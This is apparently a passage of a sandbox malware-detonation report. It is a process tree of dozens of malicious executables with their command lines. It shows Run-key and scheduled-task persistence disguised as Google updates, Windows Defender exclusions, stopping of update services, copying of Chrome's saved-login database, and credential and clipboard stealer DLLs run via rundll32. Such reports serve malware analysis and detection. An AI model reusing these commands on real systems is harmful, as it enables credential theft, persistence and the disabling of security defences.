      "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
      4⤵
      PID:7928
- - C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"
    3⤵
    PID:5180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
      4⤵
      PID:6472
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        5⤵
        
        PID:7876
- - C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe
    "C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"
    3⤵
    PID:7384
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c difficspec.bat
      4⤵
      PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\difficultspecific.exe
      C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\difficultspecific.exe
      4⤵
      PID:2212
    - - C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\callcustomerpro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\callcustomerpro.exe
        5⤵
        
        PID:6988
      - C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomer.exe
        6⤵
        
        PID:6996
- - C:\Users\Admin\AppData\Local\Temp\a\amday.exe
    "C:\Users\Admin\AppData\Local\Temp\a\amday.exe"
    3⤵
    PID:400
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:7620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:3752
- - C:\Users\Admin\AppData\Local\Temp\a\rengad.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"
    3⤵
    PID:7996
- - C:\Users\Admin\AppData\Local\Temp\a\Olfumi.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Olfumi.exe"
    3⤵
    PID:7448
- - C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe
    "C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"
    3⤵
    PID:8012
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\towardlowestpro.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\towardlowestpro.exe
      4⤵
      PID:7808
    - - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\towardlowest.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\towardlowest.exe
        5⤵
        
        PID:4696
- - C:\Users\Admin\AppData\Local\Temp\a\fbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fbinzx.exe"
    3⤵
    PID:3748
  - - C:\Users\Admin\AppData\Local\Temp\a\fbinzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fbinzx.exe"
      4⤵
      PID:7460
- - C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"
    3⤵
    PID:5444
  - - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\callcustomerpro.exe
      C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\callcustomerpro.exe
      4⤵
      PID:8140
    - - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\callcustomer.exe
        5⤵
        
        PID:5360
- - C:\Users\Admin\AppData\Local\Temp\a\windows.exe
    "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
    3⤵
    PID:6552
- - C:\Users\Admin\AppData\Local\Temp\a\w-12.exe
    "C:\Users\Admin\AppData\Local\Temp\a\w-12.exe"
    3⤵
    PID:7156
- - C:\Users\Admin\AppData\Local\Temp\a\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"
    3⤵
    PID:6752
  - - C:\Users\Admin\AppData\Local\Temp\a\Creal.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"
      4⤵
      PID:5896
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5184
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:8492
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:8544
- - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
    3⤵
    PID:1328
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
      4⤵
      PID:8264
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
        5⤵
        
        PID:9316
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c Copy "C:\Users\Admin\AppData\Local\Temp\a\1712.exe" "C:\Users\Admin\Documents\1712.pif"
      4⤵
      PID:8776
  - - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
      "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
      4⤵
      PID:7652
- - C:\Users\Admin\AppData\Local\Temp\a\win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
    3⤵
    PID:8004
- - C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"
    3⤵
    PID:6604
- - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
    3⤵
    PID:8752
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:4880
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe"
    3⤵
    PID:8952
  - - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
      C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
      4⤵
      PID:6164
- - C:\Users\Admin\AppData\Local\Temp\a\putty.exe
    "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
    3⤵
    PID:2848
- - C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
    3⤵
    PID:8368
  - - C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
      4⤵
      PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
      4⤵
      PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe
      "C:\Users\Admin\AppData\Local\Temp\a\HTMLc.exe"
      4⤵
      PID:1112
- - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HTML.exe"
    3⤵
    PID:8596
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\movwXShFsgOqA" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBDD6.tmp"
      4⤵
      Creates scheduled task(s)
      PID:8304
  - - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
      "{path}"
      4⤵
      PID:9852
- - C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
    3⤵
    PID:7088
- - C:\Users\Admin\AppData\Local\Temp\a\3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\3.exe"
    3⤵
    PID:8792
- - C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
    3⤵
    PID:6668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:5352
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:9948
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p985125742679522981943222763 -oextracted
        5⤵
        
        PID:7212
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    PID:8952
- - C:\Users\Admin\AppData\Local\Temp\a\1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
    3⤵
    PID:1264
- - C:\Users\Admin\AppData\Local\Temp\a\Ifum2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Ifum2.exe"
    3⤵
    PID:8368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:5792
- - C:\Users\Admin\AppData\Local\Temp\a\bin.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bin.exe"
    3⤵
    PID:9684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9496
- - C:\Users\Admin\AppData\Local\Temp\a\i.exe
    "C:\Users\Admin\AppData\Local\Temp\a\i.exe"
    3⤵
    PID:9944
- - C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe
    "C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe"
    3⤵
    PID:10188
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9516
- - C:\Users\Admin\AppData\Local\Temp\a\info.exe
    "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
    3⤵
    PID:6492
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:7900
- - C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe"
    3⤵
    PID:9668
- - C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe"
    3⤵
    PID:9836
- - C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe
    "C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe"
    3⤵
    PID:10112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9196
  - - C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe
      "C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe"
      4⤵
      PID:8612
- - C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
    "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
    3⤵
    PID:8988
- - C:\Users\Admin\AppData\Local\Temp\a\ed1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ed1.exe"
    3⤵
    PID:9172
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:10112
- - C:\Users\Admin\AppData\Local\Temp\a\information.exe
    "C:\Users\Admin\AppData\Local\Temp\a\information.exe"
    3⤵
    PID:8452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9684
- - C:\Users\Admin\AppData\Local\Temp\a\chinazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chinazx.exe"
    3⤵
    PID:9720
  - - C:\Users\Admin\AppData\Local\Temp\a\chinazx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chinazx.exe"
      4⤵
      PID:7724
- - C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Amadey.exe"
    3⤵
    PID:8768
  - - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
      "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
      4⤵
      PID:10132
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:9512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:5468
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:5344
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:N"
        6⤵
        
        PID:9008
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:R" /E
        6⤵
        
        PID:10876
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
        5⤵
        
        PID:6596
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
        6⤵
        
        PID:9264
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
        5⤵
        
        PID:9932
- - C:\Users\Admin\AppData\Local\Temp\a\rankobazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rankobazx.exe"
    3⤵
    PID:5128
  - - C:\Users\Admin\AppData\Local\Temp\a\rankobazx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\rankobazx.exe"
      4⤵
      PID:8328
- - C:\Users\Admin\AppData\Local\Temp\a\tedzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tedzx.exe"
    3⤵
    PID:10192
  - - C:\Users\Admin\AppData\Local\Temp\a\tedzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\tedzx.exe"
      4⤵
      PID:8376
- - C:\Users\Admin\AppData\Local\Temp\a\prosperzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\prosperzx.exe"
    3⤵
    PID:8256
  - - C:\Users\Admin\AppData\Local\Temp\a\prosperzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\prosperzx.exe"
      4⤵
      PID:9936
    - - C:\Windows\SysWOW64\help.exe
        
        "C:\Windows\SysWOW64\help.exe"
        5⤵
        
        PID:9708
      - C:\Windows\SysWOW64\cmd.exe
        
        /c del "C:\Users\Admin\AppData\Local\Temp\a\prosperzx.exe"
        6⤵
        
        PID:9480
- - C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Cpp.exe"
    3⤵
    PID:6284
- - C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Sharp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\StealerClient_Sharp.exe"
    3⤵
    PID:7852
- - C:\Users\Admin\AppData\Local\Temp\a\WWW14_64.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WWW14_64.exe"
    3⤵
    PID:8940
- - C:\Users\Admin\AppData\Local\Temp\a\Services.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Services.exe"
    3⤵
    PID:10168
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:10056
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4212
- - C:\Users\Admin\AppData\Local\Temp\a\-irrkt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\-irrkt.exe"
    3⤵
    PID:2096
- - C:\Users\Admin\AppData\Local\Temp\a\retain.exe
    "C:\Users\Admin\AppData\Local\Temp\a\retain.exe"
    3⤵
    PID:9224
- - C:\Users\Admin\AppData\Local\Temp\a\axes.exe
    "C:\Users\Admin\AppData\Local\Temp\a\axes.exe"
    3⤵
    PID:9924
- - C:\Users\Admin\AppData\Local\Temp\a\irrkt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\irrkt.exe"
    3⤵
    PID:9236
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      4⤵
      PID:8976
- - C:\Users\Admin\AppData\Local\Temp\a\Abzyvhxf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Abzyvhxf.exe"
    3⤵
    PID:9148
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      4⤵
      PID:4000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      4⤵
      PID:5044
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      4⤵
      PID:10268
- - C:\Users\Admin\AppData\Local\Temp\a\clip.exe
    "C:\Users\Admin\AppData\Local\Temp\a\clip.exe"
    3⤵
    PID:3076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s2dg.0.bat" "
      4⤵
      PID:8232
- - C:\Users\Admin\AppData\Local\Temp\a\spacezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\spacezx.exe"
    3⤵
    PID:7080
- - C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
    3⤵
    PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
      4⤵
      PID:3396
- - C:\Users\Admin\AppData\Local\Temp\a\BestSoftware.exe
    "C:\Users\Admin\AppData\Local\Temp\a\BestSoftware.exe"
    3⤵
    PID:8844
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:2900
- - C:\Users\Admin\AppData\Local\Temp\a\wealthzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wealthzx.exe"
    3⤵
    PID:1452
- - C:\Users\Admin\AppData\Local\Temp\a\v4install.exe
    "C:\Users\Admin\AppData\Local\Temp\a\v4install.exe"
    3⤵
    PID:11200
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
      4⤵
      PID:9252
- - C:\Users\Admin\AppData\Local\Temp\a\test.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
    3⤵
    PID:10824
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:9688
- - C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
    3⤵
    PID:10060
- C:\Windows\SysWOW64\cmmon32.exe
  "C:\Windows\SysWOW64\cmmon32.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\pznhcda.exe"
    3⤵
    PID:4256
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe"
    3⤵
    PID:1456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5240
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:5800
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\sbin22zx.exe"
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    PID:8740
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:9848
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:6976
- - C:\Windows\SysWOW64\typeperf.exe
    "C:\Windows\SysWOW64\typeperf.exe"
    3⤵
    PID:7972
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:6844
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5700
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7272
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4984
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4204
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5248
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1264
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5260
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4948
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:7308
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4020
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:7812
- C:\Windows\SysWOW64\chkdsk.exe
  "C:\Windows\SysWOW64\chkdsk.exe"
  2⤵
  PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\NETSTAT.EXE
    "C:\Windows\SysWOW64\NETSTAT.EXE"
    3⤵
    - Gathers network information
    PID:6480
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    PID:8848
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:6168
- C:\Windows\SysWOW64\autofmt.exe
  "C:\Windows\SysWOW64\autofmt.exe"
  2⤵
  PID:7936
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  PID:7984
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8128
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7796
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5456
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4948
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5876
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7616
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:6396
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe"
  2⤵
  PID:7600
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    PID:9412
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:10796
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:7560
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3148
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:6752
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6592
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:7804
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3628
- C:\Users\Admin\AppData\Local\Temp\FBD6.exe
  C:\Users\Admin\AppData\Local\Temp\FBD6.exe
  2⤵
  PID:7012
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\XY1oE7Dz.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\XY1oE7Dz.exe
    3⤵
    PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\jG0vc9Pk.exe
      C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\jG0vc9Pk.exe
      4⤵
      PID:7320
    - - C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\jG8tZ4jx.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\jG8tZ4jx.exe
        5⤵
        
        PID:6956
      - C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\Yx0kI0az.exe
